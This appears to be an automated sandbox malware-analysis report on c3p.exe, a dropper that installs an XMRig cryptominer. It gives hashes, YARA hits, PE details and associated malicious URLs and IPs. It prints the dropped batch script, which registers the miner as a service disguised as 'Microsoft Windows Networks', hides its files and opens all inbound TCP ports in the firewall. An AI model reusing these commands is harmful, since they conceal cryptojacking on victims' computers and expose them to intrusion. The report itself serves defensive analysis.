                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                    • Excluded IPs from analysis (whitelisted): 20.101.57.9
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target systems.exe, PID 7504 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: c3p.exe
                    No simulations
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    auto.c3pool.orgSecuriteInfo.com.FileRepMalware.25283.7828.exeGet hashmaliciousBlackMoonBrowse
                    • 5.161.70.189
                    pg_ctlk.exeGet hashmaliciousXmrigBrowse
                    • 188.34.196.123
                    logor.elfGet hashmaliciousXmrigBrowse
                    • 5.161.70.189
                    qk6CviFPOs.exeGet hashmaliciousXmrigBrowse
                    • 5.161.70.189
                    http://198.255.70.77:19490/spread.txtGet hashmaliciousETERNALBLUEBrowse
                    • 5.161.50.27
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    HETZNER-ASDEhttps://storage.googleapis.com/vtuca3aw8cqe54/qsvg3pmsrpytzq.html#uRNV.aspx?fRl9xNccv7stcyMkCcddc4ddcJffcncsXcbbb4XGet hashmaliciousPhisherBrowse
                    • 88.198.55.100
                    Orders34754733________________________pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 188.40.116.241
                    http://www.acierta24.es/Get hashmaliciousGRQ ScamBrowse
                    • 136.243.216.235
                    https://tinyurl.com/dafdadd/?email=bok@wodociagi.katowice.plGet hashmaliciousUnknownBrowse
                    • 5.161.38.67
                    file.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                    • 148.251.154.222
                    https://app.tnotice.com/ui/getEmail.ashx?k64=V1Zaa1VrOVZNVFpXVkVwUVZqQndjMVJyVWtaa1JUVkZZVWR3V21WVVFYZFVNRkp2WVVWNFZXRkhkRnBsYkZZd1YxZHdRMkZzY0VWaE0yUmhVakJWZVZkclpFcE5hM0IwVm01U1VWWXdXakZaYlRGR1pGWndTRkp1Vm1GVFJYQnpWMVpXUTJGdFNYcFRha0poVmpBMU1sbHROVk5qUlhoMFlrUkJiVlZyTUROT2JWSnRaVmhrYkdOcVVURlBWRmsxVkRGQ1dGSldTa1JYUVQwOQ==Get hashmaliciousUnknownBrowse
                    • 176.9.109.10
                    SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRATBrowse
                    • 116.203.14.211
                    file.exeGet hashmaliciousVidarBrowse
                    • 116.203.14.211
                    https://re-captha-version-3-277.buzz/ms/0406_desc_B/?c=e52190ad-32b4-4b8b-9020-6cee7a12dc83&a=l201267Get hashmaliciousGRQ ScamBrowse
                    • 136.243.216.232
                    TjFONu89sH.exeGet hashmaliciousQuasarBrowse
                    • 195.201.57.90
                    HETZNER-ASDEhttps://storage.googleapis.com/vtuca3aw8cqe54/qsvg3pmsrpytzq.html#uRNV.aspx?fRl9xNccv7stcyMkCcddc4ddcJffcncsXcbbb4XGet hashmaliciousPhisherBrowse
                    • 88.198.55.100
                    Orders34754733________________________pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 188.40.116.241
                    http://www.acierta24.es/Get hashmaliciousGRQ ScamBrowse
                    • 136.243.216.235
                    https://tinyurl.com/dafdadd/?email=bok@wodociagi.katowice.plGet hashmaliciousUnknownBrowse
                    • 5.161.38.67
                    file.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                    • 148.251.154.222
                    https://app.tnotice.com/ui/getEmail.ashx?k64=V1Zaa1VrOVZNVFpXVkVwUVZqQndjMVJyVWtaa1JUVkZZVWR3V21WVVFYZFVNRkp2WVVWNFZXRkhkRnBsYkZZd1YxZHdRMkZzY0VWaE0yUmhVakJWZVZkclpFcE5hM0IwVm01U1VWWXdXakZaYlRGR1pGWndTRkp1Vm1GVFJYQnpWMVpXUTJGdFNYcFRha0poVmpBMU1sbHROVk5qUlhoMFlrUkJiVlZyTUROT2JWSnRaVmhrYkdOcVVURlBWRmsxVkRGQ1dGSldTa1JYUVQwOQ==Get hashmaliciousUnknownBrowse
                    • 176.9.109.10
                    SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRATBrowse
                    • 116.203.14.211
                    file.exeGet hashmaliciousVidarBrowse
                    • 116.203.14.211
                    https://re-captha-version-3-277.buzz/ms/0406_desc_B/?c=e52190ad-32b4-4b8b-9020-6cee7a12dc83&a=l201267Get hashmaliciousGRQ ScamBrowse
                    • 136.243.216.232
                    TjFONu89sH.exeGet hashmaliciousQuasarBrowse
                    • 195.201.57.90
                    HETZNER-ASDEhttps://storage.googleapis.com/vtuca3aw8cqe54/qsvg3pmsrpytzq.html#uRNV.aspx?fRl9xNccv7stcyMkCcddc4ddcJffcncsXcbbb4XGet hashmaliciousPhisherBrowse
                    • 88.198.55.100
                    Orders34754733________________________pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 188.40.116.241
                    http://www.acierta24.es/Get hashmaliciousGRQ ScamBrowse
                    • 136.243.216.235
                    https://tinyurl.com/dafdadd/?email=bok@wodociagi.katowice.plGet hashmaliciousUnknownBrowse
                    • 5.161.38.67
                    file.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                    • 148.251.154.222
                    https://app.tnotice.com/ui/getEmail.ashx?k64=V1Zaa1VrOVZNVFpXVkVwUVZqQndjMVJyVWtaa1JUVkZZVWR3V21WVVFYZFVNRkp2WVVWNFZXRkhkRnBsYkZZd1YxZHdRMkZzY0VWaE0yUmhVakJWZVZkclpFcE5hM0IwVm01U1VWWXdXakZaYlRGR1pGWndTRkp1Vm1GVFJYQnpWMVpXUTJGdFNYcFRha0poVmpBMU1sbHROVk5qUlhoMFlrUkJiVlZyTUROT2JWSnRaVmhrYkdOcVVURlBWRmsxVkRGQ1dGSldTa1JYUVQwOQ==Get hashmaliciousUnknownBrowse
                    • 176.9.109.10
                    SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRATBrowse
                    • 116.203.14.211
                    file.exeGet hashmaliciousVidarBrowse
                    • 116.203.14.211
                    https://re-captha-version-3-277.buzz/ms/0406_desc_B/?c=e52190ad-32b4-4b8b-9020-6cee7a12dc83&a=l201267Get hashmaliciousGRQ ScamBrowse
                    • 136.243.216.232
                    TjFONu89sH.exeGet hashmaliciousQuasarBrowse
                    • 195.201.57.90
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Windows\debug\c3p\WinRing0x64.syswk.exeGet hashmaliciousXmrigBrowse
                      HaQQVRT0Xg.exeGet hashmaliciousRedLine, XmrigBrowse
                        1hMmINqZK8.exeGet hashmaliciousXmrigBrowse
                          SecuriteInfo.com.Trojan.InjectNET.14.20916.16428.exeGet hashmaliciousXmrigBrowse
                            aFc8xaUnnc.exeGet hashmaliciousXmrigBrowse
                              RXvFSINxlG.exeGet hashmaliciousXmrigBrowse
                                TS-240605-Millenium1.exeGet hashmaliciousBlank Grabber, Discord Token Stealer, Millenuim RAT, XmrigBrowse
                                  zTMEFv0Dh3.exeGet hashmaliciousXmrigBrowse
                                    L8PUw3vvb1.exeGet hashmaliciousXmrigBrowse
                                      nByQ55eAWj.exeGet hashmaliciousXmrigBrowse
                                        C:\Windows\debug\c3p\svchost.exe6tJtH22I7a.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, StealcBrowse
                                          file.exeGet hashmaliciousXmrigBrowse
                                            yGn9saDnXX.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, StealcBrowse
                                              SecuriteInfo.com.Trojan.DownLoader27.28375.18704.16604.exeGet hashmaliciousUnknownBrowse
                                                W0GMc7Catw.exeGet hashmaliciousUnknownBrowse
                                                  Process:C:\Users\user\Desktop\c3p.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):748
                                                  Entropy (8bit):4.6828996240903065
                                                  Encrypted:false
                                                  SSDEEP:12:luxgnoy/wHIX+XhsYyc+ATPJT5RwR4CRIh7wOtf8CuuS0mzBvadgh9:Kgnoy/qIORG+d5eRdOt1ud0Ydh9
                                                  MD5:617561CC39E6650B0965E41DC341998E
                                                  SHA1:A4E79538093248C1F05676D201A40B87716EF897
                                                  SHA-256:1FB526571985D284BD65B653BD1EF7E08155B8C0E6BD64929A105A269E6B884C
                                                  SHA-512:A71285F309D0F6415E27E324FA647B57391CC782243BA3231B94D183C6D84EA6F8A2A455FE0938818EB7AF342B6716EB98FC98068AA5CAC6E8BEE1957D735B20
                                                  Malicious:false
                                                  Preview:11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 *WinRing0x64.sys.235a64e3520b1c2c27763122b303f78aee8d7c083dfd9f1eb936cd5174383609 *benchmark_10M.cmd.d7747e7a3c782009f4ceb6e9c106115876386853929563b509da5258e3968d15 *benchmark_1M.cmd.2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec *config.json.e73491065d86b1ad69229bb5d2019e08b947e11a2a57adf5c2d9a2b5d8f4acad *pool_mine_example.cmd.810614290bdb14d2ddf10f65f8adc988a8272764f2a9e2c378e52fad162da344 *rtm_ghostrider_example.cmd.33497c69c21fa96bbc96f1d7f09608e462f8ab22555364977c0bd35fef27bc29 *solo_mine_example.cmd.8e70ef38fe14a2ee2848df3d6f7e260d1caf8cfc15de694d678b8af151d62333 *start.cmd.d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 *xmrig.exe.
                                                  Process:C:\Users\user\Desktop\c3p.exe
                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):14544
                                                  Entropy (8bit):6.2660301556221185
                                                  Encrypted:false
                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Joe Sandbox View:
                                                  • Filename: wk.exe, Detection: malicious, Browse
                                                  • Filename: HaQQVRT0Xg.exe, Detection: malicious, Browse
                                                  • Filename: 1hMmINqZK8.exe, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Trojan.InjectNET.14.20916.16428.exe, Detection: malicious, Browse
                                                  • Filename: aFc8xaUnnc.exe, Detection: malicious, Browse
                                                  • Filename: RXvFSINxlG.exe, Detection: malicious, Browse
                                                  • Filename: TS-240605-Millenium1.exe, Detection: malicious, Browse
                                                  • Filename: zTMEFv0Dh3.exe, Detection: malicious, Browse
                                                  • Filename: L8PUw3vvb1.exe, Detection: malicious, Browse
                                                  • Filename: nByQ55eAWj.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\c3p.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):478
                                                  Entropy (8bit):5.0722345607285035
                                                  Encrypted:false
                                                  SSDEEP:6:oR+AgVHzf+AaTf9HGBCkI770Agzj12IO8C/VnEQKEV8EMEkA807IsxYFMLPxFmGc:oRqTSTsBCBEx2InC/Z2b7NvwyMxdy
                                                  MD5:6585C3073CFC45A3BDD30ED7521E84A0
                                                  SHA1:5196ABC0728F1A14E554FAF155FC3B31C1F57257
                                                  SHA-256:DA2FAA5EB4171DD5272402DAB13E882445A9E8F114DEFEA3CAABD2AD841E24F4
                                                  SHA-512:FA11518E7E258D2A980D07F3E9C03EB1BF9B6A7413F62E2DA3977046AD5FCB2BB05BD55ED83512A3027D9D07B5A884F0BCCD16742F9C9FD6891ACE98F80DD849
                                                  Malicious:true
                                                  Preview:C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe..sc config "Networks2" DisplayName= "Networksrs2"..sc description "Networks2" "Microsoft Windows Networks"..Set ProcessName=systems.exe..sc start "Networks2"..attrib C:\Windows\debug\c3p +h +a..attrib C:\Windows\debug\c3p\*.json +h +a +s +r..attrib C:\Windows\debug\c3p\*.exe +h +a +s +r..netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow..
                                                  Process:C:\Users\user\Desktop\c3p.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2294
                                                  Entropy (8bit):4.1953729532377615
                                                  Encrypted:false
                                                  SSDEEP:24:1pMDhY2W5TtTWIJi9CKIHFU0TtNOGeMyMu+4gjqut6D4mY+at3CR1at30bA13GJY:EePpTdyn50hCPF8bt6UtZtEb1lgPHB
                                                  MD5:BA73071A3D8A7FE866D174AA256D1C3E
                                                  SHA1:0A38FD8A8B287D44B4964E862AB241872E036115
                                                  SHA-256:EE17B3A37459ED492847D2DC003F4904DCBF0D1579416474AC8C7B07CA96B81C
                                                  SHA-512:CCC9B11406E893CDC6F2563E0C7E00A488D1685E2D58E6324B2680FAFFA40CB47CF9A8EAB4CD77B1C67A85AA9FFD4811A21F84954F0F7345A0A477082106348D
                                                  Malicious:false
                                                  Preview:{.. "api": {.. "id": null,.. "worker-id": null.. },.. "http": {.. "enabled": false,.. "host": "127.0.0.1",.. "port": 0,.. "access-token": null,.. "restricted": true.. },.. "autosave": true,.. "background": false,.. "colors": true,.. "title": true,.. "randomx": {.. "init": -1,.. "mode": "auto",.. "1gb-pages": false,.. "rdmsr": true,.. "wrmsr": true,.. "cache_qos": false,.. "numa": true.. },.. "cpu": {.. "enabled": true,.. "huge-pages": true,.. "hw-aes": null,.. "priority": null,.. "memory-pool": false,.. "yield": true,.. "max-threads-hint": 40,.. "asm": true,.. "argon2-impl": null,.. "astrobwt-max-size": 550,.. "cn/0": false,.. "cn-lite/0": false,.. "kawpow": false.. },.. "opencl": {.. "enabled": false,.. "cache": true,.. "loader": null,..
                                                  Process:C:\Users\user\Desktop\c3p.exe
                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):294912
                                                  Entropy (8bit):5.548858855357459
                                                  Encrypted:false
                                                  SSDEEP:6144:4BULviqYnI3QA7JTXRnZSHL2GZbkG/TZgLgst2rDkXNBD:wqBlG/TZgUsxXNBD
                                                  MD5:D9EC6F3A3B2AC7CD5EEF07BD86E3EFBC
                                                  SHA1:E1908CAAB6F938404AF85A7DF0F80F877A4D9EE6
                                                  SHA-256:472232CA821B5C2EF562AB07F53638BC2CC82EAE84CEA13FBE674D6022B6481C
                                                  SHA-512:1B6B8702DCA3CB90FE64C4E48F2477045900C5E71DD96B84F673478BAB1089FEBFA186BFC55AEBD721CA73DB1669145280EBB4E1862D3B9DC21F712CD76A07C4
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Joe Sandbox View:
                                                  • Filename: 6tJtH22I7a.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  • Filename: yGn9saDnXX.exe, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Trojan.DownLoader27.28375.18704.16604.exe, Detection: malicious, Browse
                                                  • Filename: W0GMc7Catw.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6.Y.W...W...W....1..W....'..W.......W...W..<W.... ..W....0..W....5..W..Rich.W..................PE..L....@.T............................S>............@..................................S......................................d........`..._..............................................................@...............H............................text............................... ..`.rdata...I.......J..................@..@.data....0... ......................@....rsrc...._...`...`... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\c3p.exe
                                                  File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                  Category:dropped
                                                  Size (bytes):8251392
                                                  Entropy (8bit):6.631497383775146
                                                  Encrypted:false
                                                  SSDEEP:98304:/Ss0YJodntQk3Hv7I4a1Shua+XOoca2q4RVHNaAXMbmx4WH5umbLtb/IRHOhrgjY:LqQk3DBNfrkhKj4DbrxLskS3qAP2
                                                  MD5:E2FE87CC2C7DAB8CA6516620DCCD1381
                                                  SHA1:F714EC0448325435103519452610CF7AADF8BBBA
                                                  SHA-256:D0CF7388253342F43F9B04DA27F3DA9EE18614539EFDC2D9C4A0239AF51DDBE4
                                                  SHA-512:8455C47E8470E0E322426BC9B9F3C7E858D803BFC8C5D576D580F88585F550B95043139D69B0750A3E211915E3F5EC7A67E7784DCF8CAC6BD8FE51AB7E9CBED6
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\debug\c3p\systems.exe, Author: Joe Security
                                                  • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Windows\debug\c3p\systems.exe, Author: unknown
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\debug\c3p\systems.exe, Author: unknown
                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\debug\c3p\systems.exe, Author: Florian Roth
                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\debug\c3p\systems.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....Z_e...............&.._...}...2............@.............................0.......K~...`... .................................................F...@...\....v.................d.............................t.(......................@............................text....._......._.................`..`.data...`.... _...... _.............@....rdata.. ....0`......&`.............@..@.pdata........v.......v.............@..@.xdata........y.......x.............@..@.bss......2...|..........................idata...F......H....|.............@....CRT....h.... ........|.............@....tls.........0........|.............@....rsrc....\...@...\....|.............@....reloc..d............X}.............@..B........................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\netsh.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):7
                                                  Entropy (8bit):2.2359263506290326
                                                  Encrypted:false
                                                  SSDEEP:3:t:t
                                                  MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                  SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                  SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                  SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                  Malicious:false
                                                  Preview:Ok.....
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                  Entropy (8bit):7.98074133598679
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:c3p.exe
                                                  File size:3'127'301 bytes
                                                  MD5:02aa02aee2a6bd93a4a8f4941a0e6310
                                                  SHA1:03287a15bfd67ff8c3340c0bae425ecaa37a929f
                                                  SHA256:01a976b80253450a09d0b89075f5fa923a3411265f7bc8f3413d059fd662aa83
                                                  SHA512:8103b18a8957fb1cb1e0f6f00eb4c81a037151fc2cd89f13f530eb7ea3002d23cdad037fb39610c38c3a71029a6c7b767d7ce00ada4cbd37e9f6ba0ed9af0f0c
                                                  SSDEEP:49152:YKbiWztohDIZZYiOG2qPX4xRgPZcUAtijL+kOqxvDUuPBBVFJt6NGGTDVOXLyago:YKGWJ6sDYI2qPX4fgPZcUAUjSkXvDUin
                                                  TLSH:77E5333174A08033E113443587D4D7366879B9749A322A9EFF548A7D7F21EA2C267BB3
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&K.HG%.HG%.HG%.A?..SG%.A?...G%.A?..]G%.HG$..G%.A?../G%.A?..IG%.A?..IG%.A?..IG%.RichHG%.................PE..L...b.}T...........
                                                  Icon Hash:2775250905472797
                                                  Entrypoint:0x41d5db
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x547D8F62 [Tue Dec 2 10:07:30 2014 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:0
                                                  File Version Major:5
                                                  File Version Minor:0
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:0
                                                  Import Hash:4cfda23baf1e2e983ddfeca47a5c755a
                                                  Instruction
                                                  call 00007F1AE08BE19Ah
                                                  jmp 00007F1AE08B7C8Dh
                                                  mov edi, edi
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  lea eax, dword ptr [ebp+08h]
                                                  push eax
                                                  mov esi, ecx
                                                  call 00007F1AE08B7A97h
                                                  mov dword ptr [esi], 0042B220h
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  mov dword ptr [ecx], 0042B220h
                                                  jmp 00007F1AE08B7B4Ch
                                                  mov edi, edi
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  mov esi, ecx
                                                  mov dword ptr [esi], 0042B220h
                                                  call 00007F1AE08B7B39h
                                                  test byte ptr [ebp+08h], 00000001h
                                                  je 00007F1AE08B7E19h
                                                  push esi
                                                  call 00007F1AE08B4863h
                                                  pop ecx
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  mov edi, edi
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  push edi
                                                  mov edi, dword ptr [ebp+08h]
                                                  mov eax, dword ptr [edi+04h]
                                                  test eax, eax
                                                  je 00007F1AE08B7E59h
                                                  lea edx, dword ptr [eax+08h]
                                                  cmp byte ptr [edx], 00000000h
                                                  je 00007F1AE08B7E51h
                                                  mov esi, dword ptr [ebp+0Ch]
                                                  mov ecx, dword ptr [esi+04h]
                                                  cmp eax, ecx
                                                  je 00007F1AE08B7E26h
                                                  add ecx, 08h
                                                  push ecx
                                                  push edx
                                                  call 00007F1AE08BB2C3h
                                                  pop ecx
                                                  pop ecx
                                                  test eax, eax
                                                  je 00007F1AE08B7E16h
                                                  xor eax, eax
                                                  jmp 00007F1AE08B7E36h
                                                  test byte ptr [esi], 00000002h
                                                  je 00007F1AE08B7E17h
                                                  test byte ptr [edi], 00000008h
                                                  je 00007F1AE08B7E04h
                                                  mov eax, dword ptr [ebp+10h]
                                                  mov eax, dword ptr [eax]
                                                  test al, 01h
                                                  je 00007F1AE08B7E17h
                                                  test byte ptr [edi], 00000001h
                                                  je 00007F1AE08B7DF6h
                                                  test al, 02h
                                                  je 00007F1AE08B7E17h
                                                  test byte ptr [edi], 00000002h
                                                  je 00007F1AE08B7DEDh
                                                  xor eax, eax
                                                  inc eax
                                                  pop edi
                                                  pop esi
                                                  pop ebp
                                                  ret
                                                  mov edi, edi
                                                  push ebp
                                                  mov ebp, esp
                                                  mov eax, dword ptr [ebp+08h]
                                                  mov eax, dword ptr [eax]
                                                  mov eax, dword ptr [eax]
                                                  cmp eax, 00004F4Dh
                                                  Programming Language:
                                                  • [ASM] VS2008 SP1 build 30729
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [C++] VS2008 SP1 build 30729
                                                  • [EXP] VS2008 SP1 build 30729
                                                  • [LNK] VS2008 SP1 build 30729
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x2efa00x33.rdata
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2db7c0xdc.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x510000x39a8.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x2a3f00x1c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2cc100x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x384.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x2859a0x28600d8f33064c4ef0afbbef55bd2cf99d4bdFalse0.5988958494582043data6.722654883969783IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x2a0000x4fd30x5000097554bc8b9e06ca48884fe0bcde4562False0.3978515625data5.386322012281953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x2f0000x214280x16001197a4db46cf8f74c620261213b213c9False0.33824573863636365data3.4665353553434435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x510000x44d80x46006aa2cae10e88f53028dea6fff76be49bFalse0.33297991071428573data4.67739973738274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_BITMAP0x5154c0xbb6Device independent bitmap graphic, 93 x 302 x 4, 2 compression, image size 2894, resolution 2835 x 2835 px/mChineseChina0.2581721147431621
                                                  RT_ICON0x521040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192ChineseChina0.6047297297297297
                                                  RT_ICON0x5222c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320ChineseChina0.4703757225433526
                                                  RT_ICON0x527940x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640ChineseChina0.4986559139784946
                                                  RT_ICON0x52a7c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152ChineseChina0.4444945848375451
                                                  RT_DIALOG0x533240x176dataChineseChina0.6898395721925134
                                                  RT_DIALOG0x5349c0xd6dataChineseChina0.6962616822429907
                                                  RT_DIALOG0x535740xbadataChineseChina0.7204301075268817
                                                  RT_DIALOG0x536300x102dataChineseChina0.6201550387596899
                                                  RT_DIALOG0x537340x286dataChineseChina0.4953560371517028
                                                  RT_DIALOG0x539bc0x1cedataChineseChina0.6645021645021645
                                                  RT_STRING0x53b8c0xb6dataChineseChina0.7472527472527473
                                                  RT_STRING0x53c440xd6dataChineseChina0.6962616822429907
                                                  RT_STRING0x53d1c0xcadataChineseChina0.7920792079207921
                                                  RT_STRING0x53de80x74dataChineseChina0.9137931034482759
                                                  RT_STRING0x53e5c0x282dataChineseChina0.6417445482866043
                                                  RT_STRING0x540e00x94dataChineseChina0.777027027027027
                                                  RT_STRING0x541740x78dataChineseChina0.9083333333333333
                                                  RT_STRING0x541ec0x64dataChineseChina0.63
                                                  RT_STRING0x542500x4adataChineseChina0.7837837837837838
                                                  RT_GROUP_ICON0x5429c0x3edataChineseChina0.8387096774193549
                                                  RT_MANIFEST0x542dc0x6caXML 1.0 document, ASCII text, with CRLF line terminatorsChineseChina0.4090909090909091
                                                  DLLImport
                                                  COMCTL32.dllInitCommonControlsEx
                                                  SHLWAPI.dllSHAutoComplete
